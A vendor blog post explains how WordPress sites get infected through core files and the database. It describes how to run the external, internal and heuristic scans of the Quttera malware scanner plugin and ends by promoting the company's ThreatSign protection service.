18 May, 2020

Using Quttera Web Malware Scanner Plugin to Clear WordPress Malware

The popularity of WordPress also makes it a target for attacks. Here's how you can detect and clear WordPress malware with the Quttera Web Malware Scanner plugin.
WordPress is a solid, secure basis for a website. It's the most popular web CMS in the world. The downside is that it's also the most popular target for malware attacks. Every site uses a theme, and the huge majority use plugins, which can have vulnerabilities of their own. Any vulnerability that turns up will be subject to widespread attacks. You need to make sure your site is well protected and remove WordPress malware quickly.

The Quttera WordPress Malware Scanner will help you to keep your site secure and detect any problems quickly. It guards against malware, backdoors, suspicious JavaScript, viruses, malicious iframes, and much more. Should your site be blacklisted because of an infection, WordPress Malware Scanner will alert you to the situation. Once you install the plugin, it runs regular scans to determine whether your site is clean.
The Two Aspects of WordPress Protection
A WordPress site consists of files in your Web directory and a database. The Web directory contains the WordPress core files as well as files that support plugins. The database contains everything else. This includes content, customization parameters, security-related settings, HTML and URL fragments, CSS, and JavaScript. As a result, there are two kinds of targeting for WordPress attacks.

The first type of attack goes after the core files on the host. Unauthorized modification to these files can add all kinds of malicious behavior, affecting every visitor to the site. The infections don't necessarily cause a change that's visible to the user. The good news is that these infections are relatively easy to catch by comparing the files to a known good state.

The second attack type goes after the database. Database infections are harder to detect, since the content of the tables constantly changes. They can add or alter links, place JavaScript on a page, create unauthorized accounts, change passwords, and redirect pages. If an infection isn't completely cleaned up, a hook may remain that will re-infect the site. Often the best way to recognize a database infection is by changes in the site's behavior.
Quttera's Threefold Approach to WordPress Malware Detection
Full coverage in WordPress malware scanning requires three types of investigation. The Quttera WordPress Malware Scanner approaches scanning in these three ways:

  1. An external malware scanner that views pages the way a browser does.
  2. A server-side scanner that checks the WordPress source files.
  3. A heuristic server-side scanner, looking for patterns in WordPress files that may indicate previously unknown malware.
External Malware Scanner
The external scanner views the site from the user's perspective. It runs on our servers and crawls the pages on your site for the following threat indications:

  • Cross-Site Scripting (XSS) injection
  • Obfuscated JavaScript injection
  • SPAM
  • Phishing
  • Code injection
  • Malicious iframes
  • Malicious redirects
  • Defacement
  • Drive-by downloads
  • Trojans
  • Backdoors
  • Worms
  • Spyware
  • Viruses
The content of a WordPress page as seen by a client is the product of the content stored in the database, modified by the theme and plugins. Any of these could introduce JavaScript through links to third-party servers. Often this is a legitimate practice, but the added code could be malicious.

Examination of the files alone won't detect all the ways an infection can introduce hostile elements. It requires an external scan to see what is ultimately delivered to the user.
To run the external scan on your site, go to
WordPress Admin Panel -> Dashboard
Click on "Quttera" in the left panel and select "External scanner." You should see the name of your website. Click on the "Scan Now" button.
Wait for the scan to finish, then click on "Full investigation report." Review the report for any threats indicated.
Internal Malware Scan
In addition to the external scan, the Quttera malware scanner provides the ability to fully investigate WordPress source files, including PHP and JavaScript files. The issues detected include:
  • Code injection
  • Obfuscated JavaScipt injection
  • Obfuscated PHP injection
  • Drive-by downloads
  • Trojans
  • Backdoors
  • Worms
  • Spyware
  • Viruses
To run the internal scan, go to
WordPress Admin Panel -> Dashboard
Click on "Quttera" in the left panel and select "Internal scanner." Click the "Scan Now" button to start the scan. The internal scanner will subscribe to the WordPress cron job service. A scan will run every time WordPress calls the plugin handler.

The scan runs at low speed so that it won't take too much CPU utilization away from your site. It may take a while to scan all your files. When a scan is done, you can click the "Download Report" button and view the full investigation report.
Heuristic Internal Malware Scan
The perpetrators of WordPress malware try to conceal what they're doing. They use code obfuscation techniques to disguise and bury executable PHP code in data. Older versions of PHP are especially vulnerable; they provide many ways to execute data, some of which have been eliminated in PHP 7. It isn't generally possible to match these attacks to known signatures.

To overcome the limitations of conventional malware scanning, we have developed a highly sensitive heuristic scanner to detect possibly infected files. This scan may produce false positives, so use its results carefully. Legitimate software may use obfuscated code for intellectual property protection.

Each entry in the investigation report includes details of the suspected infection. Here is an example:
You can fix such problems by editing the indicated file with the text editor of your choice. Be careful when doing this; any typing error could break your site. Back the site up before making any changes.

The internal scan report lists any alien files detected in your WordPress directories. All such files are likely to be part of an infection or malware attack. Investigate any such files carefully; they could contain a malware payload, and running them as PHP could activate it. Again, back up everything first, in case a file which you delete turns out to be legitimate and necessary.
We're ready to help
You can download the plugin here.

We have posted a series of three articles to help you with the malware and hacking remediation process.
  1. Preparation
  2. Cleanup process
  3. Hardening

If you detect an infection and run into problems cleaning it up, please feel free to contact our support team. We offer full website monitoring and protection with the ThreatSign service. It will scan your site, report malware and blacklisting, run analytics, remove malware, and get you quick removal from blacklists. When you sign up for ThreatSign, you get ongoing, comprehensive protection of your website.